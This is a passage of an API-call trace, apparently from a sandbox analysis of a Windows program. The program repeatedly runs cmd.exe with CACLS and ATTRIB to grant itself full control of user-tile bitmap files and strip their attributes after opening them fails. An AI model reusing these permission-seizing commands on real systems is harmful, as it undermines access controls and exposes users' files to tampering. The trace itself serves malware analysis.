dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x924, dwThreadId=0x670)) returned 1 [0187.367] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0187.517] CloseHandle (hObject=0x1b4) returned 1 [0187.517] CloseHandle (hObject=0x120) returned 1 [0187.517] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.517] ReleaseMutex (hMutex=0xf8) returned 1 [0187.517] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.517] ReleaseMutex (hMutex=0xf8) returned 1 [0187.517] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.517] ReleaseMutex (hMutex=0xf8) returned 1 [0187.517] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.517] ReleaseMutex (hMutex=0xf8) returned 1 [0187.517] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.517] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User 
Account Pictures\\Default Pictures\\usertile32.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp", lpFilePart=0x12eab4*="usertile32.bmp") returned 0x52 [0187.517] GetLastError () returned 0x5 [0187.517] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0187.517] LocalFree (hMem=0x1c6cc8) returned 0x0 [0187.518] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0187.518] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0187.518] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.518] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0187.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0187.518] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0187.518] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.518] ReleaseMutex (hMutex=0xf8) returned 1 
[0187.518] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.518] ReleaseMutex (hMutex=0xf8) returned 1 [0187.518] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.518] ReleaseMutex (hMutex=0xf8) returned 1 [0187.518] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.518] ReleaseMutex (hMutex=0xf8) returned 1 [0187.518] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.518] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp", lpFilePart=0x12eab4*="usertile33.bmp") returned 0x52 [0187.518] GetLastError () returned 0x5 [0187.518] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0187.518] LocalFree (hMem=0x1c6cc8) returned 0x0 [0187.518] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0187.518] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0187.519] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.519] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.519] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0187.519] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0187.519] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x908, dwThreadId=0xf3c)) returned 1 [0187.520] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0187.892] CloseHandle 
(hObject=0x1b4) returned 1 [0187.892] CloseHandle (hObject=0x120) returned 1 [0187.892] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.892] ReleaseMutex (hMutex=0xf8) returned 1 [0187.892] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.892] ReleaseMutex (hMutex=0xf8) returned 1 [0187.892] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.892] ReleaseMutex (hMutex=0xf8) returned 1 [0187.892] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.892] ReleaseMutex (hMutex=0xf8) returned 1 [0187.892] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.893] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp", lpFilePart=0x12eab4*="usertile33.bmp") returned 0x52 [0187.893] GetLastError () returned 0x5 [0187.893] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0187.893] LocalFree (hMem=0x1c6cc8) returned 0x0 [0187.893] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0187.893] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0187.893] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.893] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.893] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0187.893] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0187.893] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0187.893] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.893] ReleaseMutex (hMutex=0xf8) returned 1 [0187.893] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.893] ReleaseMutex (hMutex=0xf8) returned 1 [0187.893] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.893] ReleaseMutex (hMutex=0xf8) returned 1 [0187.893] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.893] ReleaseMutex (hMutex=0xf8) returned 1 [0187.893] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0187.894] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp", lpFilePart=0x12eab4*="usertile34.bmp") returned 0x52 [0187.894] GetLastError () returned 0x5 [0187.894] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0187.894] LocalFree (hMem=0x1c6cc8) returned 0x0 [0187.894] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0187.894] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0187.894] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.894] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.894] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0187.894] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0187.894] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, 
dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xec8, dwThreadId=0xff0)) returned 1 [0187.896] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0188.068] CloseHandle (hObject=0x1b4) returned 1 [0188.068] CloseHandle (hObject=0x120) returned 1 [0188.068] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.068] ReleaseMutex (hMutex=0xf8) returned 1 [0188.068] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.068] ReleaseMutex (hMutex=0xf8) returned 1 [0188.068] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.068] ReleaseMutex (hMutex=0xf8) returned 1 [0188.068] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.068] ReleaseMutex (hMutex=0xf8) returned 1 [0188.068] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.068] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User 
Account Pictures\\Default Pictures\\usertile34.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp", lpFilePart=0x12eab4*="usertile34.bmp") returned 0x52 [0188.068] GetLastError () returned 0x5 [0188.069] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0188.069] LocalFree (hMem=0x1c6cc8) returned 0x0 [0188.069] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0188.069] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0188.069] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0188.069] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0188.069] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0188.069] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0188.069] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0188.069] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.069] ReleaseMutex (hMutex=0xf8) returned 1 
[0188.069] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.069] ReleaseMutex (hMutex=0xf8) returned 1 [0188.069] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.069] ReleaseMutex (hMutex=0xf8) returned 1 [0188.069] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.069] ReleaseMutex (hMutex=0xf8) returned 1 [0188.069] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.070] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp", lpFilePart=0x12eab4*="usertile35.bmp") returned 0x52 [0188.070] GetLastError () returned 0x5 [0188.070] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0188.070] LocalFree (hMem=0x1c6cc8) returned 0x0 [0188.070] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0188.070] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0188.070] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0188.070] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0188.070] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0188.070] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0188.071] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x84c, dwThreadId=0x42c)) returned 1 [0188.072] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0188.545] CloseHandle 
(hObject=0x1b4) returned 1 [0188.545] CloseHandle (hObject=0x120) returned 1 [0188.545] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.545] ReleaseMutex (hMutex=0xf8) returned 1 [0188.545] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.545] ReleaseMutex (hMutex=0xf8) returned 1 [0188.545] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.545] ReleaseMutex (hMutex=0xf8) returned 1 [0188.545] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.545] ReleaseMutex (hMutex=0xf8) returned 1 [0188.545] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.545] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp", lpFilePart=0x12eab4*="usertile35.bmp") returned 0x52 [0188.545] GetLastError () returned 0x5 [0188.545] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0188.545] LocalFree (hMem=0x1c6cc8) returned 0x0 [0188.545] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0188.545] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0188.545] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0188.546] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0188.546] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0188.546] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0188.546] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0188.546] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.546] ReleaseMutex (hMutex=0xf8) returned 1 [0188.546] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.546] ReleaseMutex (hMutex=0xf8) returned 1 [0188.546] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.546] ReleaseMutex (hMutex=0xf8) returned 1 [0188.546] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.546] ReleaseMutex (hMutex=0xf8) returned 1 [0188.546] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
